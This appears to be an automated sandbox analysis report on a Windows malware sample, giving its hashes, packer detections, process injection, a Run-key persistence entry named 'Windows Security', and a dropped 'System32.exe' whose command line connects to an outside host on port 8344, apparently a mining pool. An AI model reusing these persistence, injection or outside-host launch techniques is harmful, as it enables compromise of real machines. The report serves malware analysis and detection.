Analysis
max time kernel: 140s
max time network: 182s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 01-12-2022 07:41
Static task: static1
Behavioral task: behavioral1
  Sample: 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
  Resource: win10v2004-20220901-en
General
Target: 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
Size: 1.4MB
MD5: c9ddc48f08e3678e2a4e65d4951dc261
SHA1: 7b2e70ecdf86e9461f0cb4e6aeb37cae893bcfa5
SHA256: 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4
SHA512: cfa8b15fa6df43f47a63085382f18c8f2a9f170781c54c52f4ca584924c601f7664ea113ee2b103fd3e288179cc709b0fee1830c9cea868400c28c32fbb43825
SSDEEP: 24576:jxdW2AUOoj6Rc4FoweN2vtUm5a4j06/b9y8lDbe+Eltpe3f:dZA4BEoZsh5ayFy8lU6f
Malware Config
Signatures
ACProtect 1.3x - 1.4x DLL software (4 IoCs)
Detects file using ACProtect software.
  resource                                      yara_rule
  behavioral1/files/0x00090000000139eb-75.dat   acprotect
  behavioral1/files/0x0008000000013a17-78.dat   acprotect
  behavioral1/files/0x0008000000013a17-77.dat   acprotect
  behavioral1/files/0x00090000000139eb-76.dat   acprotect
Executes dropped EXE (1 IoCs)
  pid   Process
  588   System32.exe

UPX-packed resources (yara_rule upx)
  resource                                                                   yara_rule
  behavioral1/files/0x0006000000014145-70.dat                                upx
  behavioral1/files/0x0006000000014145-71.dat                                upx
  behavioral1/files/0x0006000000014145-73.dat                                upx
  behavioral1/files/0x00090000000139eb-75.dat                                upx
  behavioral1/files/0x0008000000013a17-78.dat                                upx
  behavioral1/files/0x0008000000013a17-77.dat                                upx
  behavioral1/files/0x00090000000139eb-76.dat                                upx
  behavioral1/memory/588-80-0x0000000013900000-0x000000001394B000-memory.dmp  upx
  behavioral1/memory/588-81-0x0000000011000000-0x00000000110F4000-memory.dmp  upx
  behavioral1/memory/588-82-0x0000000000400000-0x000000000040F000-memory.dmp  upx
  behavioral1/memory/588-83-0x0000000011000000-0x00000000110F4000-memory.dmp  upx
Loads dropped DLL (4 IoCs)
  pid    Process
  1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
  1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
  588    System32.exe
  588    System32.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe\""
  Process: 8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
Suspicious use of SetThreadContext (1 IoCs)
  description                              pid    Process                                                                 procid_target
  PID 1440 set thread context of 1236      1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description         ioc                                                                    Process
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0        System32.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz   System32.exe
Suspicious use of WriteProcessMemory (15 IoCs)
  description                          pid    Process                                                                 procid_target
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1440 wrote to memory of 1236     1440   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   28
  PID 1236 wrote to memory of 588      1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   29
  PID 1236 wrote to memory of 588      1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   29
  PID 1236 wrote to memory of 588      1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   29
  PID 1236 wrote to memory of 588      1236   8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe   29
Processes
1. C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"
   PID: 1440
   - Adds Run key to start application
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\8219311bc99c105c1edc420fbcd2067ea839b499248e1c45b31596161a76c4c4.exe"
      PID: 1236
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Roaming\Security\System32.exe
         Command line: C:\Users\Admin\AppData\Roaming\Security\System32.exe -o http://H4x0r_djred2:[email protected]:8344
         PID: 588
         - Executes dropped EXE
         - Loads dropped DLL
         - Checks processor information in registry
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 14KB
  MD5: 9922477bc8d154d7c1d9528e03325d0b
  SHA1: ff4401fed76657a2325485eabccfbbae9156cb7f
  SHA256: a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
  SHA512: 58266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
- Filesize: 74KB
  MD5: 93f6d0122c2b13a55ec467549429b5c8
  SHA1: 3f1e2101831d8b812c92bb03b7de0a2b47314c21
  SHA256: a11b09086205010e41ee0e938539b7fdbc132f73e85ed54df1016dee4f8793a0
  SHA512: aeef696afa62cf4c61372868f31f0706110de6f57faf5fa8990aa26b9f236405f7aee22511425009280ca861afeeda84a90a3c180a9e3eea3309a1830badd055
- Filesize: 328KB
  MD5: 5cce96ba11c1492b7ce00030d98021de
  SHA1: 94054638dea3711cf28de3ec9d9b8fe4a54aef80
  SHA256: 4453e1939e32ea39c70b7b61265fa990dfc27e054838a0a559d4c86249af11b9
  SHA512: 35dadeea5171e62b5b7cb6b0bff9b83ebb830f5d9453444513295b4e56f3d3e25abb15ef45015b000d0477754268e45e56230d15f417f12fc0f89002f3cb4652
- Filesize: 14KB
  MD5: 9922477bc8d154d7c1d9528e03325d0b
  SHA1: ff4401fed76657a2325485eabccfbbae9156cb7f
  SHA256: a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
  SHA512: 58266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
- Filesize: 14KB
  MD5: 9922477bc8d154d7c1d9528e03325d0b
  SHA1: ff4401fed76657a2325485eabccfbbae9156cb7f
  SHA256: a0b3de75033b8ede8661b316a0baf6ab5899afb9515a9d525e914be35c440d91
  SHA512: 58266baa6bb223769f88eff1709abb0fef5911bfd6a58d09cac56952a5829a763616682e674f7c12a15d692f794ce89eb0e5174a33d1a9e5d4b6cf41a83098a5
- Filesize: 74KB
  MD5: 93f6d0122c2b13a55ec467549429b5c8
  SHA1: 3f1e2101831d8b812c92bb03b7de0a2b47314c21
  SHA256: a11b09086205010e41ee0e938539b7fdbc132f73e85ed54df1016dee4f8793a0
  SHA512: aeef696afa62cf4c61372868f31f0706110de6f57faf5fa8990aa26b9f236405f7aee22511425009280ca861afeeda84a90a3c180a9e3eea3309a1830badd055
- Filesize: 328KB
  MD5: 5cce96ba11c1492b7ce00030d98021de
  SHA1: 94054638dea3711cf28de3ec9d9b8fe4a54aef80
  SHA256: 4453e1939e32ea39c70b7b61265fa990dfc27e054838a0a559d4c86249af11b9
  SHA512: 35dadeea5171e62b5b7cb6b0bff9b83ebb830f5d9453444513295b4e56f3d3e25abb15ef45015b000d0477754268e45e56230d15f417f12fc0f89002f3cb4652